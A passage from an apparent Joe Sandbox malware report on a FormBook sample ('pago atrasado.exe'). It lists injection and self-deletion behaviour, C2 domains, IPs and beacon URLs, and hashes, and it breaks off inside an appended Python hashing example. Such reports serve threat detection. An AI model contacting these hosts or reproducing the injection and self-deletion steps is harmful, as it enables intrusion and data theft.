          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Domain query: www.oddanimalsink.com
          Source: C:\Windows\explorer.exe | Domain query: www.ishhs.xyz
          Source: C:\Windows\explorer.exe | Domain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exe | Domain query: www.umgaleloacademy.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\pago atrasado.exe | Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\pago atrasado.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pago atrasado.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pago atrasado.exe | Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pago atrasado.exe | Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\pago atrasado.exe | Memory written: C:\Users\user\Desktop\pago atrasado.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\pago atrasado.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\pago atrasado.exe | Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\pago atrasado.exe | Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\colorcpl.exe | Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\pago atrasado.exe | Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: explorer.exe, 00000002.00000000.275805694.00000000089FF000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000000.281510605.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_100098CF cpuid
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_10012E00 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules1 | Application Shimming1 | Process Injection612 | Virtualization/Sandbox Evasion2 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Application Shimming1 | Process Injection612 | LSASS Memory | Security Software Discovery151 | Remote Desktop Protocol | Clipboard Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Virtualization/Sandbox Evasion2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information3 | NTDS | Process Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing11 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion1 | Cached Domain Credentials | File and Directory Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery114 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

          Behavior Graph

          [Behavior graph image not reproduced; the data recoverable from the graph follows.]
          Behavior Graph ID: 502137 | Sample: pago atrasado.exe | Startdate: 13/10/2021 | Architecture: WINDOWS | Score: 100
          Process chain: pago atrasado.exe (dropped file: C:\Users\user\AppData\Local\...\xpbpx.dll, PE32) -> pago atrasado.exe -> explorer.exe (injected) -> colorcpl.exe -> cmd.exe -> conhost.exe
          Network nodes: www.shopthatlookboutique.com, www.christinegagnonjewellery.com, shops.myshopify.com; contacted by explorer.exe: www.itskosi.com, www.crisisinterventionadvocates.com (74.208.236.134, 49793, 80, ONEANDONE-ASBrauerstrasse48DE United States) and 10 other IPs or domains
          Signatures per node: sample: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 5 other signatures; first pago atrasado.exe: Injects a PE file into a foreign process; second pago atrasado.exe: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Sample uses process hollowing technique, Queues an APC in another process (thread injection); explorer.exe: System process connects to network (likely due to code injection or exploit), Performs DNS queries to domains with low reputation; colorcpl.exe: Self deletion via cmd delete, Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          pago atrasado.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          0.2.pago atrasado.exe.2330000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.pago atrasado.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          0.0.pago atrasado.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          16.2.colorcpl.exe.4a4796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
          16.2.colorcpl.exe.2b2c88.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.2.pago atrasado.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.1.pago atrasado.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.pago atrasado.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2 | 0% | Avira URL Cloud | safe
          www.crisisinterventionadvocates.com/u9xn/ | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/Migraine_Pain_Relief.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans | 0% | Avira URL Cloud | safe
          http://www.oddanimalsink.com/u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/__media__/js/trademark.php?d=highvizpeople.com&type=ns | 0% | Avira URL Cloud | safe
          http://www.crisisinterventionadvocates.com/u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/song_lyrics.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLdrtTp | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.com | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/pics/27587/Right.png) | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/px.js?ch=2 | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/px.js?ch=1 | 0% | Avira URL Cloud | safe
          http://www.itskosi.com/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/10_Best_Mutual_Funds.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/Best_Penny_Stocks.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2F | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/Accident_Lawyers.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FL | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/pics/27587/Left.png) | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg | 0% | Avira URL Cloud | safe
          http://www.everythangbutwhite.com/u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2 | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Y | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/pics/27587/BG_2.png) | 0% | Avira URL Cloud | safe
          http://www.everythangbutwhite.com/ | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix | 0% | Avira URL Cloud | safe
          http://www.highvizpeople.com/display.cfm | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf | 0% | Avira URL Cloud | safe
          http://www.Highvizpeople.com | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/js/min.js?v2.3 | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png) | 0% | Avira URL Cloud | safe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot | 0% | Avira URL Cloud | safe
          http://www.everythangbutwhite.com | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.everythangbutwhite.com | 3.64.163.50 | true | true | - | unknown
oddanimalsink.com | 34.102.136.180 | true | false | - | unknown
www.highvizpeople.com | 208.91.197.27 | true | true | - | unknown
www.itskosi.com | 46.101.121.244 | true | true | - | unknown
www.crisisinterventionadvocates.com | 74.208.236.134 | true | true | - | unknown
shops.myshopify.com | 23.227.38.74 | true | false | - | unknown
www.baybeg.com | unknown | unknown | true | - | unknown
www.shopthatlookboutique.com | unknown | unknown | true | - | unknown
www.christinegagnonjewellery.com | unknown | unknown | true | - | unknown
www.ttemola.com | unknown | unknown | true | - | unknown
www.oddanimalsink.com | unknown | unknown | true | - | unknown
www.ishhs.xyz | unknown | unknown | true | - | unknown
www.sfcn-dng.com | unknown | unknown | true | - | unknown
www.umgaleloacademy.com | unknown | unknown | true | - | unknown

                                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.crisisinterventionadvocates.com/u9xn/ | true | Avira URL Cloud: safe | low
http://www.oddanimalsink.com/u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo | false | Avira URL Cloud: safe | unknown
http://www.crisisinterventionadvocates.com/u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo | true | Avira URL Cloud: safe | unknown
http://www.itskosi.com/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo | true | Avira URL Cloud: safe | unknown
http://www.everythangbutwhite.com/u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo | true | Avira URL Cloud: safe | unknown
http://www.highvizpeople.com/u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo | true | Avira URL Cloud: safe | unknown

                                      URLs from Memory and Binaries


                                          Contacted IPs


                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.91.197.27 | www.highvizpeople.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
34.102.136.180 | oddanimalsink.com | United States | 15169 | GOOGLEUS | false
3.64.163.50 | www.everythangbutwhite.com | United States | 16509 | AMAZON-02US | true
46.101.121.244 | www.itskosi.com | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
74.208.236.134 | www.crisisinterventionadvocates.com | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | true

                                          General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 502137
Start date: 13.10.2021
Start time: 16:42:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 17s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: pago atrasado.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/2@12/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 31.4% (good quality ratio 28.7%)
• Quality average: 76.5%
• Quality standard deviation: 31.3%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 95.100.218.79, 95.100.216.89, 20.50.102.62, 40.112.88.60, 2.20.178.33, 2.20.178.24, 20.82.209.104
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/502137/sample/pago atrasado.exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs


                                          Domains


                                          ASN

                                          Match | Associated Sample Name / URL | Detection | Context
                                          AMAZON-02 (US)
                                              6AYs2EgVeN.apk | malicious | 52.222.174.50
                                              4f0PBbcOBI | malicious | 34.249.145.219
                                              REQUIREMENT.exe | malicious | 3.121.211.190
                                              RlypFfB7n8 | malicious | 54.171.230.55
                                              7iw4z5I41w | malicious | 34.249.145.219
                                              SecuriteInfo.com.Trojan.Linux.Generic.191302.28689.5288 | malicious | 54.171.230.55
                                              ldJp8ogMLq.apk | malicious | 35.162.9.128
                                              ldJp8ogMLq.apk | malicious | 44.235.227.57
                                              SecuriteInfo.com.Linux.BtcMine.470.15094.2496 | malicious | 108.157.2.216
                                              lpa-park.apk | malicious | 54.229.52.247
                                              acciona-mobility-1-21-1.apk | malicious | 143.204.225.4
                                              D0sF4Fm8Za | malicious | 52.53.23.88
                                              7rA3B9X5j6 | malicious | 18.188.26.105
                                              ut5yFyWEDd | malicious | 18.182.10.188
                                              BW3i62l7Hw | malicious | 18.146.49.126
                                              dtMT5xGa54.exe | malicious | 3.64.163.50
                                              SecuriteInfo.com.PUA.Tool.Linux.BtcMine.2805.26628.5655 | malicious | 34.249.145.219
                                              INV#409.xlsx | malicious | 75.2.115.196
                                              syseth | malicious | 54.171.230.55
                                              Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.html | malicious | 13.32.99.121
                                          CONFLUENCE-NETWORK-INC (VG)
                                              iAuPyHuUkk.exe | malicious | 208.91.197.27
                                              DHL-Waybill.exe | malicious | 209.99.64.43
                                              orde443123.exe | malicious | 208.91.197.91
                                              wDzceoRPhB.exe | malicious | 208.91.197.27
                                              vbc.exe | malicious | 208.91.197.91
                                              TransportLabel_1189160070.xlsx | malicious | 209.99.64.33
                                              etiyrfIKft.exe | malicious | 208.91.197.27
                                              MV ROCKET_PDA.exe | malicious | 208.91.197.91
                                              DeqrIfxzHW.exe | malicious | 208.91.197.91
                                              IMG100897 TWI-SHA 202102 BANK SHEETS.exe | malicious | 208.91.197.91
                                              INVPRF2100114_pdf.exe | malicious | 208.91.197.27
                                              DC0CA5C0D9189B6D050B125A4317045BA7A4BC4524E3E.exe | malicious | 204.11.56.48
                                              PkF9Fg2Tnc.exe | malicious | 208.91.197.27
                                              2WK7SGkGVZ.exe | malicious | 208.91.197.27
                                              VC-Q-1056410-21GR1.exe | malicious | 208.91.197.91
                                              Proforma Invoice #18083-INV-Order.PDF.exe | malicious | 209.99.64.55
                                              NEW ORDER INQUIRY_Q091421.PDF.exe | malicious | 208.91.197.27
                                              ugsuHxq7Ey.exe | malicious | 208.91.197.27
                                              DHL_Online_Receipt.doc | malicious | 208.91.197.27
                                              doc#0210903000.exe | malicious | 209.99.64.70

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll
                                          Process: C:\Users\user\Desktop\pago atrasado.exe
                                          File Type: PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                          Category: dropped
                                          Size (bytes): 106496
                                          Entropy (8bit): 6.395766788929115
                                          Encrypted: false
                                          SSDEEP: 1536:oJUmgGAYhReTNsu0yGLmQEQoOoLz8I5EgZ2UlH08mAiI3Wklk9ncobUfsQzt2jwM:CUmgGASei2EAPP3xlkrEmP
                                          MD5: 4EB0E08649F542FD0E44BEF7845956FC
                                          SHA1: 5FAC196EE8AF08F8F954F3086C0250A905986C02
                                          SHA-256: 15ED84B6D171B6B6834AA6A39150B6165B2C83411929A8C6963B6E446DF44ED1
                                          SHA-512: DE809B359CCD7B65B41FD8320A16793C74AE1EECFEE3F25D8A9943CA4D2CDA675733794EC944E11D62FCD0F6AD9A0BFD7748E74841C68C6796255235B3D0B68F
                                          Malicious: false
                                          Reputation: low
                                          Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fa...........!....."...z.......*..............................................................................<...M...........................................................................h]..H............................................text...) .......".................. ..`.rdata...S...@...T...&..............@..@.data...5B.......$...z..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\upukqvxhfh
                                          Process: C:\Users\user\Desktop\pago atrasado.exe
                                          File Type: data
                                          Category: dropped
                                          Size (bytes): 215137
                                          Entropy (8bit): 7.991819771185154
                                          Encrypted: true
                                          SSDEEP: 6144:eLTysZ+qYT8Em3yAwsDPmM2cPwQd/crz4wEvdt4:symYT8ayeQdUr8wEE
                                          MD5: 34564360F76F9665C311E080E6C1CECC
                                          SHA1: 87119F439AC4DF6D9FB59DA568218EBFCAF88981
                                          SHA-256: 1AB4C2718912B5BF3137E94135F07CA6665B788448429D15C4AE04E6DF3FF8B1
                                          SHA-512: 3410542C5ED5F5EC44521001E29201B535486B9FD843186827EDA99C2F739B78DDEE99070E74AACB770F61BA48EE18629BBB73D691E0DB567DE0702017D6EB77
                                          Malicious: false
                                          Reputation: low
                                          Preview: ."hRD!.-{.b9\...7oE...\=....|... ...D.."...1..@.i.........lk....4I.<..R.R...3s.....z.,.u.....>..G>K[.....)......`{^^.e<{#..m..4.+....6-@..nF. zZ.%lG3.t...H.d\\...9..eG.....*. Xb.LK........*....o.zS/.\9..F....0}m..y..|yg.}...nq.I...`q..............O!.-{.tRv..1OM...s...}.E... ..D..."......@.i.........lk_..=4S....uw.wt0...8.C......t...T.2.......q,+.B...rq.{^^.e<{.`UU..#K.{*...4s..4..K...s........AM.zsz.8:tkH.[......*.C..b..,....,.9.*......43.9.9w.....0}m.....|yy.}.H.nq.I...`q...^......P..O!.-{@.RvK.1OM..hs.5.}.E.... ...D.."...1..@.i.........lk_..=4S....uw.wt0...8.C......t...T.2.......q,+.B...rq.{^^.e<{.`UU..#K.{*...4s..4..K...s........AM.zsz.8:tkH.[.....*..Xb..,..D.,...*......43.9.9.......0}m.....|yy.}.H.nq.I...`q...^......P..O!.-{@.RvK.1OM..hs.5.}.E.... ...D.."...1..@.i.........lk_..=4S....uw.wt0...8.C......t...T.2.......q,+.B...rq.{^^.e<{.`UU..#K.{*...4s..4..K...s........AM.zsz.8:tkH.[.....*..Xb..,..D.,...*......43.9.9.......0}m.....|yy.}
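The two entries above are the usual NSIS loader layout: a plugin DLL under %TEMP%\ns*.tmp (the directory the NSIS stub uses for its plugins) and a random-named blob whose entropy of 7.99 bits per byte over 215137 bytes is why the report marks it Encrypted: true. The added example below, which is not part of the report or of the sample, reproduces that per-file metadata over constructed inputs: the hash set, the 8-bit Shannon entropy and an encrypted/packed verdict. The 7.9-bit threshold is an assumption of this example, not the sandbox's own cut-off.

```python
"""Reproduce the per-file metadata a sandbox lists for dropped files:
MD5/SHA-1/SHA-256/SHA-512, 8-bit Shannon entropy and an 'encrypted' verdict.

Added example; not part of the sandbox report or of the sample. The 7.9-bit
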